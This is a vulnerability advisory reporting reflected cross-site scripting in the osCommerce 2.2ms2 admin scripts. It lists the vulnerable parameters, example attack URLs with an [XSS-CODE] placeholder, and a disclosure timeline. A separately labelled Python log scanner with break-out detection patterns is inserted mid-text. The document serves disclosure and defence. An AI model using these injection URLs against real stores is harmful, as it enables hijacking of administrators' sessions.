oscommerce-xss.txt

2006-11-22T00:00:00
ID PACKETSTORM:52426
Type packetstorm
Reporter Lostmon
Modified 2006-11-22T00:00:00

Description

                                        
                                            `##########################################  
Oscommerce Multiple XSS in admin section.  
Vendor url:Http://www.oscommerce.com  
Advisore:http://lostmon.blogspot.com/2006/11/  
oscommerce-multiple-xss-in-admin.html  
Vendor notify:YES Exploit available: YES  
##########################################  
  
osCommerce contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application does
not validate multiple parameters submitted to multiple scripts
in the /admin folder. This could allow a user to create a specially
crafted URL that would execute arbitrary script in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.
  
  
  
####################  
versions  
####################  
  
Oscommerce -2.2ms2-060817  
  
  
###################  
SOLUTION  
###################  
  
No solution was available at this time.  
  
  
################  
timeline  
################  
  
Discovered: 29-10-2006
vendor notify: 20-11-2006
vendor response
disclosure: 21-11-2006
  
#################  
Examples  
#################  
  
If the server has authentication implemented, you need
to log in before you can reproduce any of these flaws.
  
-------------------------------  
gID param in configuration.php  
-------------------------------  
  
http://[Victim]/catalog/admin/configuration.php?  
gID=1">[XSS-CODE]&cID=3  
  
--------------------------  
Set param in modules.php  
--------------------------  
  
http://localhost/catalog/admin/modules.php?selected_box=modules  
&set=payment">[XSS-CODE]&osCAdminID=034e6def71e10f0ca58029e93fd361e5  
  
http://localhost/catalog/admin/modules.php?set=payment  
">[XSS-CODE]&module=pm2checkout  
  
http://localhost/catalog/admin/modules.php?set=ordertotal  
&module=ot_loworderfee">[XSS-CODE]&action=edit  
  
--------------------------------------------------
option_order_by, value_page, option_page, products_options_name
in products_attributes.php
--------------------------------------------------
  
http://[Victim]/catalog/admin/products_attributes.php?  
action=update_option&option_id=1&option_order_by=">  
[XSS-CODE]&products_options_id&option_page=1  
  
http://[Victim]/definitiva/admin/products_attributes.php?  
option_order_by=products_options_id&value_page=2">[XSS-CODE]  
  
http://[Victim]/definitiva/admin/products_attributes.php?  
option_page=1&option_order_by=products_options_name">[XSS-CODE]  
  
http://[Victim]/definitiva/admin/products_attributes.php?  
action=update_option&option_id=1&option_order_by=products  
_options_id&option_page=1">[XSS-CODE]  
  
http://[Victim]/catalog/admin/products_attributes.php?  
action=update_option&option_id=1&option_order_by=products  
_options_id&option_page=1">[XSS-CODE]  
  
-------------------------------
lID param in languages.php
-------------------------------

http://localhost/definitiva/admin/languages.php?page=1&  
lID=3">[XSS-CODE]&action=new  
  
-------------------------------  
selected_box,cID in customers.php  
-------------------------------  
  
http://localhost/definitiva/admin/customers.php?page=1  
&cID=1[XSS-CODE]&action=edit  
  
http://[Victim]/catalog/admin/customers.php?selected_box=  
customers">[XSS-CODE]  
  
-------------------------------  
spage,zID,sID in geo_zones.php  
-------------------------------  
  
http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=1&  
action=list&spage=1">[XSS-CODE]&sID=1&saction=edit  
  
http://localhost/definitiva/admin/geo_zones.php?zpage=1&  
zID=2">[XSS-CODE]&action=list&spage=1&sID=2&saction=edit  
  
http://localhost/definitiva/admin/geo_zones.php?zpage=1  
&zID=1&action=list&spage=1&sID=1">[XSS-CODE]&saction=new  
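As an added defender-side example (not part of Lostmon's advisory), the following Python scan walks web server access-log lines and flags requests to the admin scripts and parameters listed above whose decoded values carry the attribute break-out characters the example URLs rely on. The log lines are constructed, and the neutral `<marker>` tag stands in for [XSS-CODE].

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Admin scripts and the parameters the advisory reports as unvalidated.
WATCHED = {
    "configuration.php": {"gID"},
    "modules.php": {"set", "module"},
    "products_attributes.php": {"option_order_by", "value_page",
                                "option_page", "products_options_name"},
    "languages.php": {"lID"},
    "customers.php": {"selected_box", "cID"},
    "geo_zones.php": {"spage", "zID", "sID"},
}
# A quote then '>' closes the attribute the value is echoed into and opens a
# new tag (the '">' in the example URLs); '<' + letter covers the unquoted cID case.
BREAKOUT = re.compile(r"""["'][^>]*>|<\s*[a-z]""", re.IGNORECASE)
# The quoted request field of an Apache common/combined log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return (script, [params]) when a watched admin parameter carries
    break-out characters after percent-decoding, otherwise None."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]
    if "/admin/" not in parts.path or script not in WATCHED:
        return None
    hits = [name for name, value in parse_qsl(parts.query, keep_blank_values=True)
            if name in WATCHED[script] and BREAKOUT.search(value)]
    return (script, hits) if hits else None

def scan_log(lines):
    """Return [(line_no, script, params)] for each matching log line."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        hit = suspicious_params(m.group(1)) if m else None
        if hit:
            findings.append((n, hit[0], hit[1]))
    return findings

# Constructed sample lines, not from any real server; the neutral <marker>
# tag stands in for the advisory's [XSS-CODE] placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Nov/2006:10:00:00 +0000] "GET /catalog/admin/configuration.php?gID=1%22%3E%3Cmarker%3E&cID=3 HTTP/1.1" 200 512',
    '10.0.0.5 - - [22/Nov/2006:10:00:01 +0000] "GET /catalog/admin/configuration.php?gID=1&cID=3 HTTP/1.1" 200 512',
    '10.0.0.7 - - [22/Nov/2006:10:00:02 +0000] "GET /catalog/admin/geo_zones.php?zpage=1&zID=1&action=list&spage=1%22%3E%3Cmarker%3E&sID=1&saction=edit HTTP/1.1" 200 900',
    '10.0.0.9 - - [22/Nov/2006:10:00:03 +0000] "GET /catalog/index.php?cPath=1%22%3E%3Cmarker%3E HTTP/1.1" 200 100',
]
for _n, _script, _params in scan_log(SAMPLE_LOG):
    print(f"line {_n}: {_script} -> {_params}")
```

The fourth sample line is deliberately outside /admin/ and is not reported, since the scan is scoped to the scripts this advisory names; widen WATCHED if you want to cover the storefront too.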
  
######################## End #####################
  
Thnx to Estrella for being my light.
  
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....